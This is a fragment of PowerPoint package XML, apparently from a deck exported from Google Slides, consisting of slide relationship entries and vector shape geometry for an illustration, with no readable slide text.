Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag454.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag451.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag450.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag449.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide27.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag457.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.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tags" Target="../tags/tag461.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.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tags" Target="../tags/tag463.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag462.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag471.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag467.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag466.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag465.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag474.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag472.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag336.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag335.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag334.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tags" Target="../tags/tag331.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag330.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag329.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag328.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tags" Target="../tags/tag343.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag342.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag341.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag339.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tags" Target="../tags/tag346.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag345.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag344.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag348.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag347.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4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag350.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag349.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5.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag352.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35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9" name="Google Shape;56;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="10504805" y="4194810"/>
            <a:ext cx="2939415" cy="4041775"/>
            <a:chOff x="-1006072" y="1271750"/>
            <a:chExt cx="4357952" cy="5991287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Google Shape;57;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1068003"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1" name="Google Shape;58;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="136840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2" name="Google Shape;59;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="166885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3" name="Google Shape;60;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1968814"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4" name="Google Shape;61;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2269261"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5" name="Google Shape;62;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2569708"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6" name="Google Shape;63;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2866777"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7" name="Google Shape;64;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1055875" y="4208223"/>
              <a:ext cx="502564" cy="182865"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12348" h="4493" extrusionOk="0">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8" name="Google Shape;65;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="2410971"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">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9" name="Google Shape;66;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="2277721"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">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0" name="Google Shape;67;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1822700"/>
              <a:ext cx="914936" cy="110053"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2704" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480"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1" name="Google Shape;68;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1981143"/>
              <a:ext cx="745828" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>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2" name="Google Shape;69;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2069828"/>
              <a:ext cx="745828" cy="54823"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1347" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1346"/>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3" name="Google Shape;70;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2158512"/>
              <a:ext cx="489947" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038" h="1335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12038" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12038"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4" name="Google Shape;71;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1130966"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5" name="Google Shape;72;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267636" y="5001539"/>
              <a:ext cx="219536" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5394" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5394"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6" name="Google Shape;73;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403330" y="5001539"/>
              <a:ext cx="220513" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5418" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5418"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7" name="Google Shape;74;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1539471"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8" name="Google Shape;75;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1675653"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9" name="Google Shape;76;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1811835"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0" name="Google Shape;77;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1598120" y="4774272"/>
              <a:ext cx="1247862" cy="2488764"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="30660" h="61149" extrusionOk="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1" name="Google Shape;78;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1615091" y="4944844"/>
              <a:ext cx="1192103" cy="155596"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="29290" h="3823" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16252" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1310"/>
                    <a:pt x="5668" y="3822"/>
                    <a:pt x="15443" y="3822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25230" y="3822"/>
                    <a:pt x="29290" y="1310"/>
                    <a:pt x="29290" y="1310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16252" y="0"/>
                  </a:ln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2" name="Google Shape;79;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1944598" y="1693805"/>
              <a:ext cx="632885" cy="1078224"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15550" h="26492" extrusionOk="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3" name="Google Shape;80;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657416" y="3209578"/>
              <a:ext cx="399348" cy="940170"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9812" h="23100" extrusionOk="0">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4" name="Google Shape;81;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425104" y="3226997"/>
              <a:ext cx="400814" cy="942124"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9848" h="23148" extrusionOk="0">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5" name="Google Shape;82;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1367473" y="2660053"/>
              <a:ext cx="1682009" cy="2371589"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41327" h="58270" extrusionOk="0">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6" name="Google Shape;83;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053022" y="2400797"/>
              <a:ext cx="384615" cy="318925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9450" h="7836" extrusionOk="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7" name="Google Shape;84;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2076873" y="2363963"/>
              <a:ext cx="343142" cy="217135"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8431" h="5335" extrusionOk="0">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8" name="Google Shape;85;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2493640" y="1956032"/>
              <a:ext cx="179528" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4411" h="5490" extrusionOk="0">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9" name="Google Shape;86;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2572150" y="1956113"/>
              <a:ext cx="78999" cy="49817"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1941" h="1224" extrusionOk="0">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0" name="Google Shape;87;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1852779" y="1956520"/>
              <a:ext cx="179080" cy="223443"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4400" h="5490" extrusionOk="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1" name="Google Shape;88;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1874798" y="1956764"/>
              <a:ext cx="79039" cy="49613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1942" h="1219" extrusionOk="0">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2" name="Google Shape;89;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1948953" y="1581881"/>
              <a:ext cx="628530" cy="659544"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15443" h="16205" extrusionOk="0">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3" name="Google Shape;90;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1947976" y="1926891"/>
              <a:ext cx="629507" cy="577777"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15467" h="14196" extrusionOk="0">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4" name="Google Shape;91;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2346794" y="2016511"/>
              <a:ext cx="137647" cy="28287"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3382" h="695" extrusionOk="0">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5" name="Google Shape;92;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2023596" y="2020541"/>
              <a:ext cx="137159" cy="19780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3370" h="486" extrusionOk="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6" name="Google Shape;93;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191728" y="2273977"/>
              <a:ext cx="142979" cy="31909"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3513" h="784" extrusionOk="0">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7" name="Google Shape;94;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2206258" y="2424565"/>
              <a:ext cx="115385" cy="10216"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2835" h="251" extrusionOk="0">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8" name="Google Shape;95;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2151028" y="2349067"/>
              <a:ext cx="225844" cy="30077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5549" h="739" extrusionOk="0">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9" name="Google Shape;96;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2164093" y="2364940"/>
              <a:ext cx="202116" cy="38258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4966" h="940" extrusionOk="0">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0" name="Google Shape;97;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2202880" y="2371737"/>
              <a:ext cx="114408" cy="12658"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="311" extrusionOk="0">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1" name="Google Shape;98;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625914" y="3196473"/>
              <a:ext cx="88238" cy="491900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2168" h="12086" extrusionOk="0">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2" name="Google Shape;99;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1769181" y="3196473"/>
              <a:ext cx="114408" cy="573300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2811" h="14086" extrusionOk="0">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3" name="Google Shape;100;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2563888" y="2040768"/>
              <a:ext cx="37851" cy="96947"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="930" h="2382" extrusionOk="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4" name="Google Shape;101;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="4483026"/>
              <a:ext cx="1885590" cy="50427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="1239" extrusionOk="0">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5" name="Google Shape;102;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2077361"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6" name="Google Shape;103;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2366168"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7" name="Google Shape;104;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929742" y="2140726"/>
              <a:ext cx="654537" cy="389499"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16082" h="9570" extrusionOk="0">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8" name="Google Shape;105;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2004183" y="2745807"/>
              <a:ext cx="51404" cy="251567"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1263" h="6181" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="2025"/>
                    <a:pt x="775" y="4097"/>
                    <a:pt x="1263" y="6180"/>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9" name="Google Shape;106;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2428683" y="2748249"/>
              <a:ext cx="83394" cy="379446"/>
            </a:xfrm>
            <a:custGeom>
